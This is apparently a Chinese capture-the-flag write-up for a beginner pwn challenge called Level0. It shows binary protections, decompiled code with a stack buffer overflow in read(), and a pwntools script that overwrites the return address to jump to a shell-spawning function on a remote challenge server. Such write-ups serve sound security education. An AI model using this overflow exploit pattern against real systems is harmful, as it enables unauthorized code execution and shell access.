查壳
[*] '\level'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
ida
// main
int __cdecl main(int argc, const char **argv, const char **envp)
{
write(1, "Hello, World\n", 0xDuLL);
return vulnerable_function(1LL);
}
// vulnerable_function
ssize_t vulnerable_function()
{
char buf[128]; // [rsp+0h] [rbp-80h] BYREF
return read(0, buf, 0x200uLL);
}
看到有个栈 buf
-0000000000000080 buf db 128 dup(?) +0000000000000000 s db 8 dup(?) +0000000000000008 r db 8 dup(?)
栈大小 80 , s 是上一个的地址, r 是要返回的地址。而且 read 里面可以读大小 200 ,利用 read 溢出覆盖 r
使用 Shift + F12 找到一个 /bin/sh ,对应函数的地址是 400678
callsystem .text 0000000000400596 00000010 00000008 R . . . . B . .
编写脚本
from pwn import *
p = remote("61.147.171.105", 62559)
payload = b'A' * (0x88) + p64(0x400596)
p.sendlineafter('Hello, World\n', payload)
p.interactive()
标签:function,攻防,No,read,db,Level0,dup,PWN,buf From: https://www.cnblogs.com/monyhzc/p/18129322